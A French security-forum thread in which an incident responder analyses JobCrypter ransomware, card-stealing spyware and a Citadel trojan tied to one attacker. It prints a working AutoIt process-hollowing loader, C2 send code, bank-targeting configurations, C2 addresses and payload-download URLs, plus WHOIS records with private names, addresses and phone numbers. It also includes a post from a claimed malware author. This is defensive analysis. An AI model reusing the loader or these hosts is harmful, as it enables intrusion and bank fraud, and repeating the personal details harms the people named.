JobCrypter & les activités carding de djamel au bled

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

JobCrypter & les activités carding de djamel au bled

Message par ѠOOT » 21 févr. 2016 16:22

Si je prends le temps d'aborder le sujet ce dimanche, c'est que je tiens à partager certaines informations, dans les limites des clauses de confidentialité, obtenues en investigations numériques. Ce micro RETEX aidera peut-être un ou deux lecteurs avertis à prendre en considération ces aspects méconnus ( ou volontairement ignorés ) lors de la découverte de rançongiciels chiffreurs en entreprises.

Cette semaine, j'ai été amené à intervenir physiquement sur plusieurs incidents réseaux où des machines avaient été compromises puis infectées par Job Crypter. La préservation de toutes les traces ( sujet déjà abordé dans la section Tech, Tips & Tricks ) et l'analyse du rançongiciel permet d'identifier et d'extraire le nécessaire pour effectuer un déchiffrage.

Contrairement aux propos de l'auteur présumé venu intimider la victime sur le forum de Malekal, même le chiffrage terminé et la clé effacée, il est techniquement possible d'extraire les éléments cryptographiques pour écrire en dix lignes de code ( merci Python Cryptography Toolkit ) un déchiffreur de fichiers.

Exemple du principe..

Code : Tout sélectionner

#!/usr/bin/env python
import hashlib, base64
from Crypto.Cipher import DES3
clef="13371337133713371337"
lock="B75RCHC/3882brKgGhF/UnzPMWXC077I"
print base64.b64decode(DES3.new(hashlib.md5(clef).digest(),DES3.MODE_ECB).decrypt(base64.b64decode(lock)))
On pourrait y passer quelques instants de plus mais là n'est pas l'objectif.

Dans tous les cas observés, les compromissions initiales sont situées sur janvier 2016 et ce n'est que 10 à 15 jours après que les JobCrypter ont été délivrés et exécutés, au début du mois de février 2016. Avant cette période, d'autres codes malveillants ont été utilisés et l'un deux est un programme d'espionnage qui semble avoir été développé par le même auteur.

Image

Ce PE ( 5fc20b27bcc3ada24bce99420d010b6a392c57a8 ) a été compilé depuis Microsoft VC# le lundi 18 janvier 2016 à 03:14:37 et se fait passer pour le composant "svchost.exe" de Microsoft Windows mais ce n'est pas tout... ce code malveillant spécialisé dans les vols de numéros de cartes bancaires est signé numériquement, le certificat a été délivré par feue la société française : SBO INVEST.

Image

L'entreprise du secteur de la finance, dirigée par Sylvain Boisrivaud, a cessée son activité le 2 octobre 2015 mais comme vous le constatez le certificat est valide jusqu'au 3 mai 2016.

Le programme se nomme "ATSV2" : AT (Automated Teller?) S (Scanner/Stealer?) version 2.
On retrouve le même compilateur, les mêmes erreurs et... le même mauvais français.

La chaîne UNICODE "djamel" est harcodée dans le binaire.

Image

Dans les transmissions des ordres au C2, il y a cette portion.. "le bled"

Code : Tout sélectionner

connexion.Send("i||" + this.RegRead("vn") + "||" + this.PC() + "||" + 
this.OsFullName() + "||le bled||" + this.GetAllProcess() + "||" + 
Conversions.ToString(this.VideoInstalled()) + "||" + this.awtitle + 
"||" + smethod_0());
Image

HOST.OPERATEUR.ME ( S15444656.ONLINEHOME-SERVER.INFO )

↘ Domain ID : D16140701-ME
Domain Name : OPERATEUR.ME
Nameservers : A.NS.JOKER.COM
Nameservers : B.NS.JOKER.COM
Nameservers : C.NS.JOKER.COM
Domain Create Date : 13-Jul-2015
Domain Last Updated Date : 11-Sep-2015
Domain Expiration Date : 13-Jul-2017
Created by : CSL GmbH R26-ME (113)

Last Updated : Afilias R54-ME (700001)
Domain Status : CLIENT TRANSFER PROHIBITED
Registrant ID : COME-18845
Registrant Name : costa philippe
Registrant Address : 5 rue louis guegan
Registrant City : pluzunet
Registrant Country : FRANCE
Registrant Postal Code : 22140
Registrant Phone : +33.661452058
Registrant E-mail : costa.philippe@outlook.fr


Le service 87.106.111.99:1216/TCP est toujours actif.
Après avoir posté, le port a changé c'est désormais 87.106.111.99:1217/TCP

Le programme est capable par exemple d'enregistrer les frappes clavier, de repérer des numéros de cartes de crédit, de réaliser des captures d'écrans à intervalles réguliers et suivant la configuration d'enregistrer des séquences vidéos ( ffmpeg -r 12.4 -f image2pipe -i pipe:.bmp -pix_fmt yuv420p -c:v libx264 -an -bufsize 60000k -b:v 1800k -y -threads 2 )

Image

Ci-dessous un exemple de configuration permettant de cibler certaines banques.

→ HKCU\Software

Code : Tout sélectionner

    vn  REG_SZ  "ATS V2 + CC"

    bins        REG_SZ  "4970;4974;4974;4979;4978;4973;5130;5131;5134;4035;4150;4972;4971;5136;5612;
4562;5301;4977;4533;4975;4976;5135;3746;3749;4035;4056;4059;4062;4067;4118;4135;4138;4150;4186;4201;
4205;4533;4556;4556;4558;4561;4654;4662;e-Cart;5295;5163;5294"
    
    pluginwititle  REG_SZ  ""

    we  REG_SZ  "PayPal=Paypal;eCBL=e-Carte Bleue WEB;e-cartebleue=e-Carte Bleue WEB;ersion Nomade -
La Banque Postale=e-Carte Bleue WEB;BNP Net Entreprises=BNP Entreprises;LCL Entreprises=LCL Entrepri
ses;CIC=CIC;Cyberplus=Banque Populaire"

    ve  REG_SZ  "La Banque Postale;LCL;CIC;BNP;AUTH;Société Générale"

    VideoMode   REG_SZ  1
    veTime      REG_SZ  6000
    
Le(s) attaquant(s) se serve(nt) d'entreprises françaises pour se maintenir dans un système ( bindshell ), récupérer des informations ( keylogger ), dérober des identifiants ( stealer ), gagner des richesses ( carding + ransomware ), utiliser des terminaux comme services ( routages / C2 ), se dissimuler ( courriels ), utiliser des certificats ( signatures numériques ),... ce qui contraste forcément avec le message de la rançon : "en veux juste nourrir nos familles"

Dans la grande majorité des cas, les réactions des victimes arrivent trop tard, après apparition des symptômes visibles et des paralysies : messages de prise en otage des fichiers + fichiers illisibles. Les attentes immédiates sont de : stopper l'infection, récupérer les fichiers, sécuriser et relancer l'activité comme avant incident. Et finalement, rares sont les entreprises qui exigent de réelles expertises - c'est bien dommage - elles comprendraient vite que JobCrypter n'est que la cerise sur le gâteau.

to be continued...

Rappel: Plateforme PHAROS
https://www.internet-signalement.gouv.fr/
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ


Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: JobCrypter & les activités carding de djamel au bled

Message par ѠOOT » 22 févr. 2016 14:01

En grattant un peu sur la période du mois de janvier 2016, j'ai pu remettre
la main sur des fichiers ayant été effacés. L'un d'eux a retenu mon attention.

→ "%tmp%\1\lol.bin"

...
0510h: 6A 62 39 6A 72 72 66 74 78 37 37 73 37 75 77 6E jb9jrrftx77s7uwn
0520h: 6A 6E 69 6C 79 7A 6E 33 72 35 66 79 67 34 73 62 jnilyzn3r5fyg4sb
0530h: 39 31 30 37 36 A3 48 4B BE 98 6C 4A A9 99 4C 53 91076£HK¾˜lJ©™LS
0540h: 0A 86 D6 48 7D 41 55 33 21 45 41 30 36 66 64 D3 .†ÖH}AU3!EA06fdÓ
...


Le fichier contient un bloc de 0x530 + un numérique + l'entête d'un AutoIT.
C'est une compresssion classique en LZSS avec un stream de type EA06.
Une fois le mot de passe trouvé, le script est lisible et déprotégé.

Il a été créé le 20 janvier 2016 à 13:31:58 depuis le profile de
la session Windows C:\Users\larbii\AppData\Local\Temp\...

Je ne vais pas détailler le script, je vais directement aux binaires.

Code : Tout sélectionner

$DATA="0x4D5A..."
DllCall("kernel32.dll", "int", "DeleteFileA", "str", @AutoItExe & ":Zone.Identifier")
If ProcessExists("avgui.exe") Then
	If StringInStr(@ScriptFullPath, "lol2.bin") = 0 Then
		$A = StringMid(FileRead(FileOpen(@AutoItExe, 0)), StringInStr(FileRead(FileOpen(@AutoItExe, 0)), "£HK¾˜lJ©™LS") + StringLen("£HK¾˜lJ©™LS"))
		$B = StringReplace(FileRead(FileOpen(@AutoItExe, 0)), "£HK¾˜lJ©™LS" & $A, "")
		FileDelete(@TempDir & "\up.exe")
		$LLD = FileOpen(@TempDir & "\up.exe", 18)
		FileWrite($LLD, $B)
		FileClose($LLD)
		FileDelete(@TempDir & "\r.txt")
		FileWrite(@TempDir & "\r.txt", @AutoItExe)
		FileCopy(@TempDir & "\lol.bin", @TempDir & "\lol2.bin", 1)
		ShellExecute(@TempDir & "\up.exe", "/AutoIt3ExecuteScript " & @TempDir & "\lol2.bin", @ScriptDir)
		Exit
	EndIf
EndIf
Local $GETPID
$ROT = @AutoItExe
If Not FileExists($ROT) Then
	$ROT = @SystemDir & "\svchost.exe"
EndIf
If ProcessExists("avgui.exe") Then
	If $ROT = @AutoItExe Then $ROT = FileRead(@TempDir & "\r.txt")
EndIf
$GETPID = Y()
FileDelete(@TempDir & "\pid.txt")
FileWrite(@TempDir & "\pid.txt", $GETPID)
Func Y()
	$BBINARYIMAGE = $DATA
	Local $BBINARY = Binary($BBINARYIMAGE)
	Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")
	DllStructSetData($TBINARY, 1, $BBINARY)
	Local $PPOINTER = DllStructGetPtr($TBINARY)
	Local $TSTARTUPINFO = DllStructCreate("dword  cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
	Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
	Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", $ROT, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))
	If @error Or Not $ACALL[0] Then
		Return SetError(1, 0, 0)
	EndIf
	Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")
	Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")
	Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
	DllStructSetData($TCONTEXT, "ContextFlags", 65538)
	$ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
	If @error Or Not $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(2, 0, 0)
	EndIf
	Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)
	$PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
	Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")
	If Not ($SMAGIC == "MZ") Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(3, 0, 0)
	EndIf
	Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)
	$PPOINTER += 4
	If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(4, 0, 0)
	EndIf
	Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)
	Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")
	$PPOINTER += 20
	Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)
	$PPOINTER += 96
	Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")
	If $IMAGIC <> 267 Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(5, 0, 0)
	EndIf
	Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
	$PPOINTER += 128
	Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")
	Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
	$ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)
	If @error Or $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(6, 0, 0)
	EndIf
	$ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
	If @error Or Not $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(7, 0, 0)
	EndIf
	Local $PREMOTECODE = $ACALL[0]
	Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)
	Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
	$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
	If @error Or Not $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(8, 0, 0)
	EndIf
	Local $TIMAGE_SECTION_HEADER
	Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA
	Local $IVIRTUALADDRESS
	For $I = 1 To $INUMBEROFSECTIONS
		$TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)
		$ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")
		$PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")
		$IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")
		If $ISIZEOFRAWDATA Then
			$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)
			If @error Or Not $ACALL[0] Then
				DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
				Return SetError(9, $I, 0)
			EndIf
		EndIf
		$PPOINTER += 40
	Next
	DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)
	$ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
	If @error Or Not $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(10, 0, 0)
	EndIf
	$ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD)
	If @error Or $ACALL[0] = -1 Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(11, 0, 0)
	EndIf
	Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId")
EndFunc
Func X()
	Exit
EndFunc
$DATA="0x4D5A..."
Les deux $DATA sont des PE 32-bits :

)) Le premier, écrit en Visual Basic, est packé UPX 3.91 ( 1698b71032b55a294748963917d54880e0919f89 )

CompanyName: Bill
ProductName: Project1
FileVersion: 1.00
InternalName: vbstub
OriginalFilename: vbstub.exe


Image

)) Le deuxième est un Citadel, un cheval de troie personnalisable initialement développé pour pirater des identifiants et des services bancaires en ligne ( 6c77e0ebb6f8144642a4f26127c27048f7669e06 )

Le C2 du Citadel est situé chez eUKhost sur 109.203.100.122:80/TCP

Celui-ci se met à jour en téléchargeant une configuration :
→ http://109.203.100.122/fifo/config.dll ( Wed, 20 Jan 2016 13:12:59 GMT )

L'URL du Control Panel a été ajoutée au CCT de Xylitol, comme il était en ligne, j'en ai profité pour bavarder un peu avec lui. Il m'a conseillé de tester la nouvelle release du décodeur qui fût présenté lors du codeblue.jp de 2013. Cette version envoi du rêve, arigatô You Nakatsuru & merci Xylitol pour l'info ^_^

citadel_decryptor.py -v -d config.dll 410A2831A748A4DC6EAC36504F1E0644.EXE
[*] start to decrypt config.dll
[*] get base config & several params
[*] found base config at RVA:0x00002780, RA:0x00001b80
[*] found login key: C1F20D2340B519056A7D89B7DF4B0FFF
[*] use RC4 key at (base config + 0x0000030a)
[*] found following xor key for AES plus:
[252, 164, 193, 50, 70, 245, 200, 171, 208, 197, 207, 220, 115, 80, 171, 66]
[*] found RC4 salt: 0xD6490B8F
[*] try to unpack
[*] decrypt data using following key:
[67, 138, 196, 17, 83, 130, 186, 60, 99, 2, 54, 44, 145, 166, 60, 148, 159, 51, 30, 37, 63, 185, 223
, 214, 184, 111, 183, 185, 165, 153, 41, 106, 124, 228, 76, 193, 84, 127, 23, 240, 147, 219, 75, 94,
69, 7, 172, 184, 154, 120, 8, 227, 148, 131, 128, 235, 103, 21, 59, 179, 155, 34, 120, 18, 175, 88,
64, 165, 105, 47, 18, 100, 1, 19, 67, 237, 18, 179, 110, 7, 122, 24, 207, 198, 140, 132, 72, 164, 2
49, 173, 107, 8, 135, 108, 153, 128, 203, 96, 209, 41, 107, 3, 188, 125, 40, 231, 226, 176, 139, 77,
217, 243, 28, 109, 250, 170, 188, 229, 143, 234, 23, 205, 159, 196, 46, 202, 135, 10, 221, 172, 205
, 52, 250, 76, 211, 93, 198, 255, 192, 241, 137, 57, 151, 183, 193, 119, 158, 136, 158, 218, 87, 50,
161, 222, 89, 171, 13, 253, 86, 35, 87, 199, 245, 158, 186, 187, 90, 192, 25, 45, 195, 213, 244, 23
6, 44, 144, 240, 152, 47, 112, 38, 89, 162, 57, 60, 12, 36, 247, 210, 81, 212, 45, 254, 167, 216, 61
, 17, 230, 119, 245, 86, 151, 165, 6, 71, 129, 5, 123, 252, 160, 74, 226, 216, 95, 241, 116, 32, 237
, 98, 82, 246, 53, 184, 208, 118, 113, 2, 103, 61, 128, 66, 43, 70, 116, 222, 32, 227, 56, 95, 102,
144, 14, 125, 29, 117, 209, 70, 22, 248, 9, 82, 194, 226, 223, 62, 77]
[*] try to AES+ decryption
[*] use following AES key:
[48, 229, 61, 171, 193, 158, 150, 212, 126, 236, 68, 15, 31, 25, 89, 187]
[*] parse decrypted data... OK
[*] decompress decrypted data
[*] wrote decrypted data[/color][/size]

La configuration est peu personnalisée, assez basic.

=> Liste des 637 sites redirigés vers Google.
Image

=> Configuration du C2 actif
http://109.203.100.122/fifo/file.php|file=soft.exe
http://109.203.100.122/fifo/gate.php
http://109.203.100.122/fifo/file.php

=> Liste des C&C alternatifs
http://s186598balooba125.com/djamel/file.php|file=config.bin
http://baladzabiviongaalkdce.com/xxx/file.php|file=config.bin
http://tenknafabalojsgdhincv.com/xxx/file.php|file=config.bin

On retrouve le djamel de l'ATSV2, de Citadel, derrière JobCrypter.
Ces DNS ne sont pas enregistrés, adeptes du sinkholing, hello .o/

to be continued...
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: JobCrypter & les activités carding de djamel au bled

Message par ѠOOT » 22 févr. 2016 22:28

Les autres machines examinées n'ont pas été infectées de la même manière que celle avec l'AutoIT. Les utilisateurs ont été victimes de campagnes par courriels piégés avec fichiers JavaScript en pièces jointes.

Ci-dessous, un JS décodé qui télécharge et exécute la charge.

Image

Échantillon 87560B5E3230895CD563265AAF92A47C178A27AD sur MDB.
+ Rapport d9ab3ec1a22c306aa745336e977e79ba5f16a17c0fdccddbae1f22f5a1cae476 sur VxSteam Sandbox.
#Exposed Botnets : http://www.exposedbotnets.com/2016/02/z ... rance.html

http://placidi.fr/1.exe ( 87.106.229.29 )

* placidi.fr est actif depuis 2008, il semble donc avoir été compromis.
* Le binaire distant a été modifié plusieurs fois au cours des derniers jours.
* L'entête HTTP indique que l'exécutable a été déposé sur l'httpd le 22 février 2016 à 04:59:55 GMT

Le "svchost.exe" est toujours signé mais par une autre entreprise : GRANIFLOR

Image

Le code est assez similaire mais le paramétrage diffère.

Image

L'attaquant prends soin de mettre à jour les infos.
Et de modifier le port au C2 en fonction des campagnes.
→ VictimeName = "SPAM 21/02/2016";
87.106.111.99:1218/TCP


>> Historique : Mai 2015 ( Project35 ) ( TrojanSpy:MSIL/Hoetou.A )
[ Fri May 01 2015 00:08:30 ( DF315C4F845030A9BE7D1488876CC4E7 ) ]

Image
UPDATE.MICROSOFTDOWNLOADING.COM ( 87.106.111.99:35/TCP )


>> Historique : Décembre 2015

[ Sun Dec 20 2015 23:12:38 ( 4E86F05B4F533DD216540A98591FFAC2 ) ]

Image

VictimeName = "Spam Djamel"
213.136.92.111:1216/TCP


>> Historique : Janvier 2016

[ Mon Jan 04 2016 00:36:39 ( DA53262F284B5508D823CFD008D7E861 ) ]

Image

VictimeName = "2 Spam"
213.136.92.111:1216/TCP

[ Mon Jan 04 2016 10:24:57 ( 375EC40796DEAAA161F9F7C9AE5CB76C ) ]

Image

VictimeName = "2 Spam Updated"
213.136.92.111:1216/TCP

[ Mon Jan 11 2016 16:27:20 ( 4E691A11F3EDDEC8267AF8C0201E5EC2 ) ]

Image

VictimeName = "ATS"
87.106.111.99:1216/TCP

[ Mon Jan 18 2016 03:14:37 ( 2435CF6C09FB962D3B0A66EB18F536E0 ) ]
VictimeName = "ATS V2"
87.106.111.99:1216/TCP


>> Historique : Février 2016

[ Tue Feb 02 2016 03:02:06 ( C8C6459705F37D06AB3F1706652B7761 ) ]

Le "svchost.exe" est signé par MAELOU


Image

Image

VictimeName = "BUILD 2.2 UP 1"
87.106.111.99:1216/TCP

[ Mon Feb 08 2016 03:34:58 ( 71E8B3345526632F2D03167A2FAEB681 ) ]

Image

VictimeName = "BUILD 2.2 UP 1"
87.106.111.99:1217/TCP

[ Mon Feb 15 2016 12:12:01 ( 1C9A1A866FF285E4019234851DB19B74 ) ]

Image

VictimeName = "SPAM 16/02/2016";
87.106.111.99:1217/TCP

[ Tue Feb 23 2016 17:09:28 ( 72401D2DFF08FCD189D85E5628886558 ) ]

Image

VictimeName = "V3";
87.106.111.99:1219/TCP

to be continued...
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

raver2046
Messages : 1
Inscription : 23 févr. 2016 00:02

Re: JobCrypter & les activités carding de djamel au bled

Message par raver2046 » 23 févr. 2016 00:05

bonjour,

personnellement je suis vivement intéressé par le décryptage des fichiers. Pouvez vous m'aider?
Se sont des .css

Coder
Messages : 2
Inscription : 22 févr. 2016 23:58

Re: JobCrypter & les activités carding de djamel au bled

Message par Coder » 23 févr. 2016 00:10

Bonsoir,
je suis l'hauteur de ces virus, je peux savoir pourquoi vous vous donner du mâle a suivre les traces de nos applications ?, je veux juste savoir la raison, personnellement je fais ça pour gagner de l'argent, et j'avoue que ça rapporte, et sachez que même si vous scanner sur Virustotal par exemple, et que le virus deviens détecter, il me suffit de le recompiler pour avoir une version 100% indétectable, de mon coté je ne fais pas d'effort la preuve vous avez vue que le virus dérobe les numéros de cartes bancaires automatiquement, et j'ajouterai ceci a vos informations, le virus est capable aussi d'effectuer un Auto Transférer d'un compte bancaire de la victime, vous n'avez pas trouvé ceci sur le Code source du svchost.exe, vue que l'option se charge comme plugin de l’extérieur, comme le gestionnaire des fichiers, et le Process Manager, et la Webcam et tous ce qui vas avec, si vous avez besoin de plus d'informations il suffit de demander, je me ferai une joie de vous aider, avec l'avancement des système de sécurité, même les hackers apprend aussi,
Bien Cordialement.


Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: JobCrypter & les activités carding de djamel au bled

Message par ѠOOT » 23 févr. 2016 21:42

NEWBOSS2015.COM ( 89.46.104.35 | 62.149.128.72 )

Domain ID: 1986930406_DOMAIN_COM-VRSN
Domain Name: NEWBOSS2015.COM

Created on 2015-12-12 - Expires on 2017-12-12 - Updated on 2015-12-14

Registrant Name: vincent dautriche
Registrant Organization: vincent dautriche
Registrant Street: 9 hameau de gravelin, 9
Registrant City: illies
Registrant Postal Code: 59480
Registrant Country: FRANCE
Registrant Email: takboulilia@gmail.com
→ http://www.newboss2015.com/1.txt

Image

→ http://www.newboss2015.com/code.txt

Image

→ http://www.newboss2015.com/sBuild1.exe DA53262F284B5508D823CFD008D7E861 ( 03 Jan 2016 22:44:47 )

→ http://www.newboss2015.com/update.exe 375EC40796DEAAA161F9F7C9AE5CB76C ( 04 Jan 2016 08:25:23 )

→ http://www.newboss2015.com/2016/sBuild1.exe 4E691A11F3EDDEC8267AF8C0201E5EC2 ( 11 Jan 2016 14:28:13 )

5 noms de domaine ont été enregistrés avec : costa.philippe@outlook.fr
3 noms de domaine résolvent actuellement en 213.136.92.111
4 noms de domaine utilisent l'identité de Costa Philippe
MONDNS.ME ( 213.136.92.111 )

Domain ID: D11728691-ME
Domain Name: MONDNS.ME

Created on 2014-04-01 - Expires on 2017-04-01 - Updated on 2014-05-31

Registrant ID: COME-17511
Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140
TAMADA3S.COM ( 213.136.92.111 )

Domain ID: 1852845382_DOMAIN_COM-VRSN
DOMAIN NAME: TAMADA3S.COM

Created on 2014-04-01 - Expires on 2019-04-01 - Updated on 2016-01-09

Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140
MICROSOFTDOWNLOADING.COM ( 213.136.92.111 )

Domain ID: 1852997103_DOMAIN_COM-VRSN
Domain Name: MICROSOFTDOWNLOADING.COM

Created on 2014-04-02 - Expires on 2018-04-02 - Updated on 2014-04-02

Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140

+ UPDATE.MICROSOFTDOWNLOADING.COM ( 213.136.92.111 | 87.106.111.99 | 87.106.18.150 | 217.160.206.177 )
OPERATEUR.ME ( 213.136.92.111 )

Domain ID: D16140701-ME
Domain Name: OPERATEUR.ME

Created on 2015-07-13 - Expires on 2017-07-13 - Updated on 2015-09-11

Registrant ID: COME-18845
Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140

+ HOST.OPERATEUR.ME ( 87.106.111.99 )
AV-FUCKER.COM ( 213.136.92.111 )

Domain ID: 1951025699_DOMAIN_COM-VRSN
DOMAIN NAME: AV-FUCKER.COM

Created on 2015-08-04 - Expires on 2016-08-04 - Updated on 2016-01-09

Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140
SCAN4CRYPT.COM (?) - expired
